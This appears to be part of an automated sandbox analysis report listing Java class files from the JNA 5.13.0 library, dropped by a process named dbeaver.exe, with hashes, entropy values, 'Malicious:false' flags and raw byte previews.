      Preview:Manifest-Version: 1.0..Ant-Version: Apache Ant 1.10.12..Created-By: 1.8.0_262-b10 (AdoptOpenJDK)..Main-Class: com.sun.jna.Native..Implementation-Title: com.sun.jna..Implementation-Vendor: JNA Development Team..Implementation-Version: 5.13.0 (b0)..Specification-Title: Java Native Access (JNA)..Specification-Vendor: JNA Development Team..Specification-Version: 5..Bundle-Category: jni..Bundle-ManifestVersion: 2..Bundle-Name: jna..Bundle-Description: JNA Library..Bundle-SymbolicName: com.sun.jna..Bundle-Version: 5.13.0.v20230812-1000..Bundle-RequiredExecutionEnvironment: JavaSE-1.6..Bundle-Vendor: JNA Development Team..Bundle-ActivationPolicy: lazy..Export-Package: com.sun.jna;version="5.13.0", com.sun.jna.ptr;version=".. 5.13.0";uses:="com.sun.jna", com.sun.jna.win32;version="5.13.0";uses:=".. com.sun.jna" ..Bundle-NativeCode: com/sun/jna/win32-x86/jnidispatch.dll; processor=x86.. ;osname=win32, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-.. 64;osname=win32, com/sun/jna/win3
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):133
      Entropy (8bit):4.619513024333627
      Encrypted:false
      SSDEEP:
      MD5:FDF9D63655C5FF14B7B98655C181049B
      SHA1:3257E7CB0B9B2C58B3F1F22D1F3E8A18C3C8BBDB
      SHA-256:E993A7528904E00251C71A6F716CBE91579D8410363C0EF971B51F2CBD1D049C
      SHA-512:3143EDAF243E5DCFEB2D6CBEC996C0916AEDA5F2DBC56F86A3C32A382BE8C73BEB92DB73B6E7421944E73E9595041E24CAEEF593262A091AD8F4C86752A0E57A
      Malicious:false
      Reputation:unknown
      Preview:.......2...........SourceFile...AltCallingConvention.java.. com/sun/jna/AltCallingConvention...java/lang/Object......................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):295
      Entropy (8bit):5.0788430215770735
      Encrypted:false
      SSDEEP:
      MD5:876511F0ED7E95910B006AA8B486453C
      SHA1:F8D5A23B5FDB3FC6BF786CAFC8A6BECFECCFF9A2
      SHA-256:7AC90409C502DFB61CF7C079AA2F6D0548C745CF888778FBF4230CC68E8E98EC
      SHA-512:07E1A1DE70F75D8FB58F9092B0EABD651676743C67665CDB659BA37A317297AA903FD9E2EF08F4C202EE60A3A3518696EAC4C9A14B1AFDF8D5F828FDC9D78A26
      Malicious:false
      Reputation:unknown
      Preview:.......2...........uncaughtException...(Lcom/sun/jna/Callback;Ljava/lang/Throwable;)V...SourceFile...Callback.java.....-com/sun/jna/Callback$UncaughtExceptionHandler...UncaughtExceptionHandler...InnerClasses...java/lang/Object...com/sun/jna/Callback..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):766
      Entropy (8bit):5.431991749804602
      Encrypted:false
      SSDEEP:
      MD5:109B4DB14555D2C297639C658277F0D3
      SHA1:22218068D408B03696A793E93BDA40DA91C902EA
      SHA-256:D711E26545D9DA4762B0C0ACFB80155114ED652B879CF6E953D403103BBCE043
      SHA-512:2FDCCC1FF5315A87CC348437662062D4C69B77BF678AF62C8DBC003AEEAF38967A7434BCE0616787777E80AB1FA0D5B2B42E6FB5D824976FA31B9060DC8B1221
      Malicious:false
      Reputation:unknown
      Preview:.......2.................. ..!."....#..$..%..&...UncaughtExceptionHandler...InnerClasses...METHOD_NAME...Ljava/lang/String;...ConstantValue..'...FORBIDDEN_NAMES...Ljava/util/List;...Signature..$Ljava/util/List<Ljava/lang/String;>;...<clinit>...()V...Code...LineNumberTable...SourceFile...Callback.java...java/lang/String...hashCode...equals...toString..(..).*..+..,.-........com/sun/jna/Callback...java/lang/Object..-com/sun/jna/Callback$UncaughtExceptionHandler...callback...java/util/Arrays...asList..%([Ljava/lang/Object;)Ljava/util/List;...java/util/Collections...unmodifiableList.."(Ljava/util/List;)Ljava/util/List;.........................................................=............Y...SY...SY...S.........................<...=...<..........................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1101
      Entropy (8bit):5.046488844584799
      Encrypted:false
      SSDEEP:
      MD5:860D2AB9A1FCE868E9EBB1257E11E2B3
      SHA1:444369DE17C2DEB349B4324BB0B9340822843372
      SHA-256:4A333A49236E31F8769A1DB81F84FAEBE19C9C911011E34985FE04B29387E7A2
      SHA-512:4E6C4C3E2FD5C06663CF225E18C24AC22ABEBBD3BEA8BA7FEB85796F31AE3821773567EED200518C6E148DFBE29238C280FA3826998ECF060D1F8CB3C0E5A369
      Malicious:false
      Reputation:unknown
      Preview:.......2.*....#....$....%....&..'..(...method...Ljava/lang/reflect/Method;...args...[Ljava/lang/Object;...index...I...<init>..B(Ljava/lang/Class;Ljava/lang/reflect/Method;[Ljava/lang/Object;I)V...Code...LineNumberTable...LocalVariableTable...this..&Lcom/sun/jna/CallbackParameterContext;...javaType...Ljava/lang/Class;...m...LocalVariableTypeTable...Ljava/lang/Class<*>;...Signature..E(Ljava/lang/Class<*>;Ljava/lang/reflect/Method;[Ljava/lang/Object;I)V...getMethod...()Ljava/lang/reflect/Method;...getArguments...()[Ljava/lang/Object;...getIndex...()I...SourceFile...CallbackParameterContext.java....).................$com/sun/jna/CallbackParameterContext...com/sun/jna/FromNativeContext...(Ljava/lang/Class;)V.!........................................................*+...*,...*-...*....................."...#...$...%...&.....4.........................................................................................../........*...................'.............................../........*........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):384
      Entropy (8bit):5.104777537065032
      Encrypted:false
      SSDEEP:
      MD5:5E149DA286CD4515749390A6F25EE239
      SHA1:FC2CB7A75CD240747BBA8F6899DB8D7D601C4B41
      SHA-256:8BEB020EF5807A611C5F0DB7CAA708A1861BB6C3042CF160D325BFDD7ED7B89B
      SHA-512:252AAD6443D7D98BD256B1EECDAE9672786BD58B3B0070CD58919C0AF2AFF3B9CDF2AAF8377E0C109D30332D5BA38173890E0280C2C90096E13F35C5C98A549D
      Malicious:false
      Reputation:unknown
      Preview:.......2..............callback..'([Ljava/lang/Object;)Ljava/lang/Object;...getParameterTypes...()[Ljava/lang/Class;...Signature...()[Ljava/lang/Class<*>;...getReturnType...()Ljava/lang/Class;...()Ljava/lang/Class<*>;...SourceFile...CallbackProxy.java...com/sun/jna/CallbackProxy...java/lang/Object...com/sun/jna/Callback................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):994
      Entropy (8bit):5.214915505894848
      Encrypted:false
      SSDEEP:
      MD5:B8DD46C55C3FF3E2BCB074A1437A135B
      SHA1:CD4ED4BB1455BA7DF2DCB0187FB638B263FAA8D6
      SHA-256:6D18A7F6B091C9FB013F6A8608E433053384F550DBE1DCFD5A8B83E52E55D2A3
      SHA-512:76BAC041A8087A8419080731CCD873FC563DB6D46C3C1FB756F57E5529B8EB5789286BAE8AB45516330980C69AA1B35875F5A5B9A4FC10EE199E4792B8620259
      Malicious:false
      Reputation:unknown
      Preview:.......2.2....$..%....&....'..(.............)..+..,...FIELDS...Ljava/util/List;...Signature..$Ljava/util/List<Ljava/lang/String;>;...daemon...Z...detach...name...Ljava/lang/String;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...AttachOptions...InnerClasses..-Lcom/sun/jna/CallbackReference$AttachOptions;...getFieldOrder...()Ljava/util/List;..&()Ljava/util/List<Ljava/lang/String;>;...<clinit>...SourceFile...CallbackReference.java........utf8..-..........java/lang/String../.0..1..+com/sun/jna/CallbackReference$AttachOptions...com/sun/jna/Structure...setStringEncoding...(Ljava/lang/String;)V...createFieldsOrder..%([Ljava/lang/String;)Ljava/util/List;...com/sun/jna/CallbackReference. ...............................................................=........*...*.....................k...r...s...........................................................w......................... ...!.........2............Y...SY...SY...S......................l...".....#...........*....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1119
      Entropy (8bit):5.389483499380378
      Encrypted:false
      SSDEEP:
      MD5:B4AD92BEA8E62AFFCE382DAAE82E198B
      SHA1:B119854781AAE4984EB862F754EBBBA92B475704
      SHA-256:85B8B9B0B255C212CEA252FAED8F85675E5CD8F204F01648EC9803CF80110652
      SHA-512:AF9B89DA5537991AC56702F729CC764BE328174698ED0909D757BB53D79FA976683F8927A43AC54A31C6A6E1EAD17B39E0844D82A5B0475577DF69E6175D80A7
      Malicious:false
      Reputation:unknown
      Preview:.......2.;................. .!..".#..$.%..&.'..(..)..*...cbstruct...Lcom/sun/jna/Pointer;...<init>...(Lcom/sun/jna/Pointer;)V...Code...LineNumberTable...LocalVariableTable...this...CallbackReferenceDisposer...InnerClasses..9Lcom/sun/jna/CallbackReference$CallbackReferenceDisposer;...run...()V...StackMapTable..+...SourceFile...CallbackReference.java............,..-..../..0.1..2..3.4..5..6.7..8..9.:..7com/sun/jna/CallbackReference$CallbackReferenceDisposer...java/lang/Object...java/lang/Runnable...java/lang/Throwable...com/sun/jna/Pointer...peer...J...com/sun/jna/Native...freeNativeCallback...(J)V...com/sun/jna/CallbackReference...access$200...()Ljava/util/Map;...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/util/Map...remove..&(Ljava/lang/Object;)Ljava/lang/Object;.0.................................F........*...*+.........................................................!...................X*.....S*............*..............W*.......*......&L...*..............W*.......*....+....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):8101
      Entropy (8bit):5.884895783356858
      Encrypted:false
      SSDEEP:
      MD5:85FC59AB4FAC71AF73A7566C30DC8F4F
      SHA1:C3D3DEDABDC82636DF93BEBD2761ACEAA7549A4A
      SHA-256:EB30820611908018B379C934BE6C61FDBF04B4725A961AFEF9E8BD3F65188AD0
      SHA-512:9C4835CE8C798D7EEFE596F15ADFC67A248D4E72160E045B7F6573D1E4F82D8B2AF109158502FF6C465FEE0DF72DCE72F3F6975443BAD294841E5DE5F767B831
      Malicious:false
      Reputation:unknown
      Preview:.......2.p..W.........W....W.................W.................W..........................................................................................W....W.........W....................(..........*....W............./......./....2......./......./............*....*..../....*..../....*....*....*....D..........E............H..............D....D......................Q....Q..........................callbackMethod...Ljava/lang/reflect/Method;...toNative...Lcom/sun/jna/ToNativeConverter;...fromNative.."[Lcom/sun/jna/FromNativeConverter;...encoding...Ljava/lang/String;...this$0...Lcom/sun/jna/CallbackReference;...<init>..f(Lcom/sun/jna/CallbackReference;Ljava/lang/reflect/Method;Lcom/sun/jna/TypeMapper;Ljava/lang/String;)V...Code...LineNumberTable...LocalVariableTable...i...I...e...Ljava/lang/SecurityException;...this...DefaultCallbackProxy...InnerClasses..4Lcom/sun/jna/CallbackReference$DefaultCallbackProxy;...mapper...Lcom/sun/jna/TypeMapper;...argTypes...[Ljava/lang/Class;...returnType.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):3272
      Entropy (8bit):5.67132104719459
      Encrypted:false
      SSDEEP:
      MD5:8F800B25D28312DC08CD7EBA94828540
      SHA1:66E65FD2902B976395507519951CEC09776192A9
      SHA-256:6D74704DC46EA34AB440FC0EF1203D0F87F8ED5585031E0043C0CCED42C901C2
      SHA-512:C62D880E5FB67D763A1BA3F57474CF73291E70FF751025C95D56C603EAAB022A13C976CB7B01C6F120E896617776B91AFDDAE14356E2C2070B36E70764559A31
      Malicious:false
      Reputation:unknown
      Preview:.......2....'.U..&.V..W..X..Y..Z.[..\....]..&.^.._.`....a..b....U..c....d....e....f..g..h....i..j.k..l..m.n..o.._.p..'.q..r.s.._.t..'.u..v.w..v.x....y..z.{....|....}....~.................function...Lcom/sun/jna/Function;...options...Ljava/util/Map;...Signature..$Ljava/util/Map<Ljava/lang/String;*>;...<init>..((Lcom/sun/jna/Pointer;ILjava/util/Map;)V...Code...LineNumberTable...LocalVariableTable...this...NativeFunctionHandler...InnerClasses..5Lcom/sun/jna/CallbackReference$NativeFunctionHandler;...address...Lcom/sun/jna/Pointer;...callingConvention...I...LocalVariableTypeTable..=(Lcom/sun/jna/Pointer;ILjava/util/Map<Ljava/lang/String;*>;)V...invoke..S(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object;...str...Ljava/lang/String;...m...Ljava/lang/reflect/Method;...cls...Ljava/lang/Class;...o...Ljava/lang/Object;...proxy...method...args...[Ljava/lang/Object;...Ljava/lang/Class<*>;...StackMapTable......Exceptions......getPointer...()Lcom/sun/jna/Pointer;...So
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):17887
      Entropy (8bit):5.92119258381699
      Encrypted:false
      SSDEEP:
      MD5:4EF1381E16F6F3E152EDF6FAC5B34A06
      SHA1:BFB701816EA4C3CBCB3A6845E197DF3D73F998DC
      SHA-256:238626F5A52AC2E27C8D46743211B76A9B9890DEA7134E53EBA0974EB2324A32
      SHA-512:F6887A2EBEF5A0F225534CCEC2BA35636C2C8DA13E1C49411FB39FADAE07392FDB6B09D8E8BBA2F5E6ABF82361663B35B4C652DA736A6D0E0B4A29B72EC2B45E
      Malicious:false
      Reputation:unknown
      Preview:.......2...............................................................................................0................................................#............0..........$.............>....(...............-....0............>...................x...................x.........>.................0....>.................B....B...........................K.......K....K.......K...............T......................Y.................]......................................h....0.......0....0.........0....0............q........................... ....x...................K..........c.......>....T.........T..................................................-................. ....!.."....#....$....%....&.......'.......(.......).......*.......+............,..-...../.........0....1.......2.......3.4..5.......6..0.7..8..9..:.........;..<..0.=..>..?....@..A...CallbackReferenceDisposer...InnerClasses...NativeFunctionHandler...DefaultCallbackProxy..B...AttachOptions...callbackMap...Ljava/util/Map;...Sig
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):555
      Entropy (8bit):4.999900834923723
      Encrypted:false
      SSDEEP:
      MD5:3C4A83D6EEFBD6129D092D031B1C4155
      SHA1:2D4CC03A882F235B64DAD17A63A8C0383D1767FD
      SHA-256:FCCC1D8810194B39BDF71A072823C07AA44C86D83B8E97A862AAE2BB1852CD08
      SHA-512:B96B2B4D4A4A88139D6C2E5B3DFA9A5950BDE344902B8C56ACD8150F2CCF5F5DD8F0342B2C883B104E8D8AC2C941ECA9AF8556854DBCB40AA9B31F87D0FBD45E
      Malicious:false
      Reputation:unknown
      Preview:.......2.....................method...Ljava/lang/reflect/Method;...<init>...(Ljava/lang/reflect/Method;)V...Code...LineNumberTable...LocalVariableTable...this..#Lcom/sun/jna/CallbackResultContext;...callbackMethod...getMethod...()Ljava/lang/reflect/Method;...SourceFile...CallbackResultContext.java............!com/sun/jna/CallbackResultContext...com/sun/jna/ToNativeContext...()V.!...............................F........*...*+........................... ........................................./........*...................!............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1496
      Entropy (8bit):4.759133229213721
      Encrypted:false
      SSDEEP:
      MD5:486E51D9BC7C94BE1C62F1C09EA16800
      SHA1:BBECFC7E436E50EE8CE3394BA502B7130BC2FD4C
      SHA-256:9513FFB97D38926BC4EA50E60A2696DD3E698D4A090CC5F8165D838390A849D5
      SHA-512:E9F88F6B83798AB0021E11EEA749406862C32C355766631B9E55CEB456922FEC11A1EAAEA0ED31869D6E83FE88252835FA77AD3785EF19FB140DD2F068812421
      Malicious:false
      Reputation:unknown
      Preview:.......2.3....(....)....*....+....,....-........./....0..1..2...daemon...Z...detach...name...Ljava/lang/String;...group...Ljava/lang/ThreadGroup;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..'Lcom/sun/jna/CallbackThreadInitializer;...(Z)V...(ZZ)V...(ZZLjava/lang/String;)V...(ZZLjava/lang/String;Ljava/lang/ThreadGroup;)V...getName..*(Lcom/sun/jna/Callback;)Ljava/lang/String;...cb...Lcom/sun/jna/Callback;...getThreadGroup../(Lcom/sun/jna/Callback;)Ljava/lang/ThreadGroup;...isDaemon...(Lcom/sun/jna/Callback;)Z...SourceFile...CallbackThreadInitializer.java...............................................%com/sun/jna/CallbackThreadInitializer...java/lang/Object.!.......................................................4........*....................6...7...............................?........*.....................<...=.........................................J........*......................@...A..... .............................................U........*..-.............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):703
      Entropy (8bit):5.171346451812115
      Encrypted:false
      SSDEEP:
      MD5:933BE9567FE2D24B5A633D63410DF4E7
      SHA1:BC2A55DB405024D006DE4C18D2D658F4EBE21B55
      SHA-256:E139B98C8C62A821F5E55542B517549B0A344E6F46ADE755D5B51DDBEC225500
      SHA-512:6FDB455DF08317FDB7EA0D91DA7CEDDB8BBAB721B1A3469DD53C66B1D73728A67F5C18CFB4C5A8A8F73667358603B069F30931F6262BF3E981E348C6C5212CAA
      Malicious:false
      Reputation:unknown
      Preview:.......2.!........................type...Ljava/lang/Class;...Signature...Ljava/lang/Class<*>;...converter...Ljava/lang/Object;...<init>..&(Ljava/lang/Class;Ljava/lang/Object;)V...Code...LineNumberTable...LocalVariableTable...this...Entry...InnerClasses..%Lcom/sun/jna/DefaultTypeMapper$Entry;...LocalVariableTypeTable..)(Ljava/lang/Class<*>;Ljava/lang/Object;)V...SourceFile...DefaultTypeMapper.java................. ..#com/sun/jna/DefaultTypeMapper$Entry...java/lang/Object...()V...com/sun/jna/DefaultTypeMapper. ...............................................k........*...*+...*,...................1...2...3...4..... ....................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):4072
      Entropy (8bit):5.446923500710172
      Encrypted:false
      SSDEEP:
      MD5:F7B87579F62B1FC3B9B622173F32C4EE
      SHA1:B2F16E6DACB028D9FD8D042C3FB6F85A5E73CDD7
      SHA-256:9225EBD32CB7C3B04ED78EBEF3A9F103CFF792907D29200DF0E600D437D0F41B
      SHA-512:60D423268B9DB8C664BD2ADBD2FB6C783E0D5C72AA3404DBC88AA6B4130A194326877D413FBACFD7FF4D000B29A8DC4716305FE6371F95E11625F589B63AED0A
      Malicious:false
      Reputation:unknown
      Preview:.......2....&.`..a....`..%.b..%.c..d....e..f....e..g....e..h....e..i....e..j....e..k....e..l....e..m....n..o.p..%.q..%.r..%.s..t.u..v.w..v.x....y..z.{....|..%.}..~...............Entry...InnerClasses...toNativeConverters...Ljava/util/List;...Signature..7Ljava/util/List<Lcom/sun/jna/DefaultTypeMapper$Entry;>;...fromNativeConverters...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/DefaultTypeMapper;...getAltClass..$(Ljava/lang/Class;)Ljava/lang/Class;...cls...Ljava/lang/Class;...LocalVariableTypeTable...Ljava/lang/Class<*>;...StackMapTable..*(Ljava/lang/Class<*>;)Ljava/lang/Class<*>;...addToNativeConverter..3(Ljava/lang/Class;Lcom/sun/jna/ToNativeConverter;)V...converter...Lcom/sun/jna/ToNativeConverter;...alt.....6(Ljava/lang/Class<*>;Lcom/sun/jna/ToNativeConverter;)V...addFromNativeConverter..5(Ljava/lang/Class;Lcom/sun/jna/FromNativeConverter;)V..!Lcom/sun/jna/FromNativeConverter;..8(Ljava/lang/Class<*>;Lcom/sun/jna/FromNativeConverter;)V...addTypeConv
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):967
      Entropy (8bit):5.500207552680608
      Encrypted:false
      SSDEEP:
      MD5:2ACCA9CBD9EF45C5E7FF3A511E47D844
      SHA1:F421B7742001D885B19DED549DF9721762D134C3
      SHA-256:CC97253B5741962174D82358000BDBAB4F723299151C5D434F1D8BC6A9EE4F16
      SHA-512:52205E6B1A6F54A8CD5EC277F89274156E76C44F560BA9F34858D1D158CCB5A28166CF905141D5FFA1358A286A961C324E040EDFFA08DCE4F6A3D881E54F5372
      Malicious:false
      Reputation:unknown
      Preview:.......2.0......................................!..F$SwitchMap$com$sun$jna$ELFAnalyser$ArmAeabiAttributesTag$ParameterType...[I...<clinit>...()V...Code...LineNumberTable...LocalVariableTable...StackMapTable......SourceFile...ELFAnalyser.java...EnclosingMethod.."..$..'.(.......).*..+.,...java/lang/NoSuchFieldError..-.*....*...com/sun/jna/ELFAnalyser$1...InnerClasses...java/lang/Object...com/sun/jna/ELFAnalyser../..;com/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType...ArmAeabiAttributesTag...ParameterType...values..@()[Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...UINT32..=Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...ordinal...()I...NTBS...ULEB128..-com/sun/jna/ELFAnalyser$ArmAeabiAttributesTag. .......................................7...................O...K..........O...K..........O...K..............#.&...'.2.5................................W....M....M......................... ...............#...%.....#.&@.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1378
      Entropy (8bit):5.419986908104008
      Encrypted:false
      SSDEEP:
      MD5:327E70A7BA22E817D870D259964615A3
      SHA1:828AAA8F6D9EE249217194978E116B1343AB5EF7
      SHA-256:853754393C19297C3CACABD65A514C2AD28A5A0F24EE88C12BFB45DA38D9A1EE
      SHA-512:BBEA032BF438929F15FA60C0887CCC1DB7FA9792346EBC9BAD19935152BB768D3729D7422F3D4DA89CD0F618700CE8281AAFC3FFB57D31606CFB70D30230F9E4
      Malicious:false
      Reputation:unknown
      Preview:.......2.;....+..,.-........../....0.......0....1.......2.......3..4...UINT32..6...ArmAeabiAttributesTag...InnerClasses...ParameterType..=Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...NTBS...ULEB128...$VALUES..>[Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...values..@()[Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...Code...LineNumberTable...valueOf..Q(Ljava/lang/String;)Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...LocalVariableTable...name...Ljava/lang/String;...<init>...(Ljava/lang/String;I)V...this...Signature...()V...<clinit>..OLjava/lang/Enum<Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;>;...SourceFile...ELFAnalyser.java..........7.8..;com/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType....9..".#..................java/lang/Enum..:..-com/sun/jna/ELFAnalyser$ArmAeabiAttributesTag...clone...()Ljava/lang/Object;..5(Ljava/lang/Class;Ljava/lang/String;)Ljava/lang/Enum;...com/sun/jna/ELFAnalyser
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):6322
      Entropy (8bit):5.799545537279753
      Encrypted:false
      SSDEEP:
      MD5:E0AF0D33005B3F5F757560DEBCEB786B
      SHA1:19F3492DB2AE42B2AE0FA73246DF59F898C4393A
      SHA-256:14D81CEA2E617FDC50E16AFA47D59C2F6395E155502717BB81D65AA727E1C5C6
      SHA-512:A5A2A412C5CAD81A3B52EC3F8EF310615058E180BF89203048AB27AFBADA1C599AD0F6863CFC21B95D8A59279BBF5B7182D763AC5F05BEC44A64759DC2E6DB5E
      Malicious:false
      Reputation:unknown
      Preview:.......2.M..{................................................{................................................................................~....~............ .......".......~................................................................................................................................................................................................... .......!.......".......#.......$.......%.......&.......'.......(.......).......*.......+.......,.......-.............../.......0.......1.......2....3..4...ArmAeabiAttributesTag...InnerClasses..5...ParameterType...value...I...name...Ljava/lang/String;...parameterType..=Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag$ParameterType;...tags...Ljava/util/List;...Signature..ALjava/util/List<Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag;>;...valueMap...Ljava/util/Map;..SLjava/util/Map<Ljava/lang/Integer;Lcom/sun/jna/ELFAnalyser$ArmAeabiAttributesTag;>;...nameMap..RLjava/util/Map<Ljava/lang/String;Lcom/sun/jna/ELFAnalyser$ArmAe
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2029
      Entropy (8bit):5.215340634842896
      Encrypted:false
      SSDEEP:
      MD5:F02B07A0553309706CDE95F8E49A703B
      SHA1:5FF7A89629FCEF1C341F52B02DD859F1107B06EB
      SHA-256:95951B35BE10ADD5EB49B4FC99178C2D90034A1F5584314A99FC5F3054DB4208
      SHA-512:C1A092C4BACAC6CA4A0449354F356B66589D4DBB00D391B18CA499E9FC1D0CC1B8EF3EBB9DFDC6DB2BDBBFA9C2D973926FEF2BC00952965D4E7A9F0E43BE05A8
      Malicious:false
      Reputation:unknown
      Preview:.......2.`....=..>.?....@....A..>.B....C....D....E....F..G....=..H....I....J..K..L..M..N..O....P....Q..S..T...nameOffset...I...name...Ljava/lang/String;...type...flags...offset...size...<init>...(ZLjava/nio/ByteBuffer;)V...Code...LineNumberTable...LocalVariableTable...this...ELFSectionHeaderEntry...InnerClasses../Lcom/sun/jna/ELFAnalyser$ELFSectionHeaderEntry;..._64bit...Z...sectionHeaderData...Ljava/nio/ByteBuffer;...StackMapTable..S..U...getName...()Ljava/lang/String;...setName...(Ljava/lang/String;)V...getNameOffset...()I...getType...getFlags...getOffset...getSize...toString...SourceFile...ELFAnalyser.java.. .V..U..W.X............Y.Z.......................java/lang/StringBuilder...ELFSectionHeaderEntry{nameIdx=..[.\..[.]..., name=..., type=..., flags=..., offset=..., size=..[.^..:.1.._..-com/sun/jna/ELFAnalyser$ELFSectionHeaderEntry...java/lang/Object...java/nio/ByteBuffer...()V...getInt...(I)I...getLong...(I)J...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(I)Ljava/lang
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):3519
      Entropy (8bit):5.814276655801717
      Encrypted:false
      SSDEEP:
      MD5:38A229664779DD8D4889032B086B075A
      SHA1:E256C2934DAC62C553C650FDB8591892EBDEF6F7
      SHA-256:ED2BDB98CE26259D6C8DE8139539DA80F506019063088081BCA7A4B8E0134128
      SHA-512:C879BF766A3F9A921D932A613CA345F120EAE896017C03C75F648F1849EAA4E70C1C3BE5DBE5B87E76F43B4EA4409C5DF2E5481C19E749C9B4E9EDF6C969A382
      Malicious:false
      Reputation:unknown
      Preview:.......2....).a..b....a..(.c..d.e..d.f..d.g..d.h..i.j..i.k..d.l..m.n..o.p..d.q..d.r..d.s..d.t..v....w..x.y..x.z....{....|..d.}..~.......x..........................q..d....d....d.............................entries...Ljava/util/List;...Signature...ELFSectionHeaderEntry...InnerClasses..ALjava/util/List<Lcom/sun/jna/ELFAnalyser$ELFSectionHeaderEntry;>;...<init>..4(ZZLjava/nio/ByteBuffer;Ljava/io/RandomAccessFile;)V...Code...LineNumberTable...LocalVariableTable...shoff...J...shentsize...I...shnum...shstrndx...S...header...Ljava/nio/ByteBuffer;...i...b...B...eshe../Lcom/sun/jna/ELFAnalyser$ELFSectionHeaderEntry;...this...ELFSectionHeaders..+Lcom/sun/jna/ELFAnalyser$ELFSectionHeaders;..._64bit...Z...bigEndian...headerData...raf...Ljava/io/RandomAccessFile;...tableLength...data...stringTable...stringBuffer...baos...Ljava/io/ByteArrayOutputStream;...StackMapTable..............v..~......Exceptions......getEntries...()Ljava/util/List;..C()Ljava/util/List<Lcom/sun/jna/ELFAnalyser$ELFSectionHeader
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):9113
      Entropy (8bit):5.779411927299776
      Encrypted:false
      SSDEEP:
      MD5:AB966E9344D3543A726230C4DD7549C8
      SHA1:7927320EBA3514C6E189F093A0DD7D87DA620698
      SHA-256:440E007326E1AB8D9BC555C11CDC18CB0713867F1F7CCD0429FC4693B8175225
      SHA-512:3B8826A5CC3CF9B8638EF17DCFF2DC240B7252EFE91E8CF6A6A8972D5149611E6BF696AD62813D6D7AB50A3926D6D2A5BB7DDC8084F8B52BF5C14F2EE715C07C
      Malicious:false
      Reputation:unknown
      Preview:.......2...................................................................Y..............................................................................................................%....%.........................+....O....+....+..............7....5.......\.......7.......9..................... ....!...."..#....$..%.&..'..D......(....)..5.*..\.+..Z.,..\.-..../..7......0..1..2..O.3..4..5..S.6..9.7..9.8..9.9..9.:..;..<...InnerClasses..=...ArmAeabiAttributesTag...ELFSectionHeaderEntry...ELFSectionHeaders...ELF_MAGIC...[B...EF_ARM_ABI_FLOAT_HARD...I...ConstantValue........EF_ARM_ABI_FLOAT_SOFT........EI_DATA_BIG_ENDIAN........E_MACHINE_ARM....(...EI_CLASS_64BIT...filename...Ljava/lang/String;...ELF...Z..._64Bit...bigEndian...armHardFloatFlag...armSoftFloatFlag...armEabiAapcsVfp...arm...analyse..-(Ljava/lang/String;)Lcom/sun/jna/ELFAnalyser;...Code...LineNumberTable...LocalVariableTable...res...Lcom/sun/jna/ELFAnalyser;...Exceptions...isELF...()Z...this...is64Bit...isBigEndian...getFilen
